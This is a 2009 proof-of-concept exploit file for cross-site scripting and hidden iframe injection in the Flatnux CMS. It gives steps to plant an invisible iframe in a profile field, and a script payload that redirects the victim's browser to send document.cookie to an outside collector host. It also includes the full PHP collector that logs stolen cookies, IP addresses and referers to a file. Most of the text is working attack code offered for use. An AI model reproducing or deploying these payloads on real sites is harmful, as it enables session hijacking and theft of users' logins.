flatnux-xss.txt
Posted on 02 February 2009
/* - Flatnux-2009-01-27 XSS/Iframe injection p0c + 1] Create acount + 1] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username] - Set iframe in the Job fields (Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>) + 3] Now m4k3 frieNdship witch Sheep Greetings : cOndemned , sid.psycho , wszyscy których ników nie umie wymówić :P and Biggest 4 g0rion l0l "... droga jest ważniejsza od celu .... :P" http://www.wrzuta.pl/audio/iL4UkPk6YK/ Alfons Luja */ <script type="text/javascript"> path = "http://localhost/~flatnux/index.php?mod=02_Flatforum"><script>location.href="http://0xc00000fdh.boo.pl/collector.php?kuka="%2Bdocument.cookie;<%2Fscript>"; location.href = path; </script> /*++++++++++++++++++collector.php++++++++++++++++++++++ <?php if(isset($_GET['kuka'])){ $gethim = $_GET['kuka']; $data = "KUKI_GRABER: "; $data.= date("dmY H:i:s")." "; $data.= "REFERER: ".$_SERVER['HTTP_REFERER']." "; $data.= "IP: ".$_SERVER['REMOTE_ADDR']." "; $data.= "CIACHO: ".$gethim." "; $hnd = fopen("KUKI_FLATNUX.TXT","a"); if(!hnd) exit(666); flock($hnd,LOCK_EX); fwrite($hnd,$data); flock($hnd,LOCK_UN); fclose($hnd); } ?> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
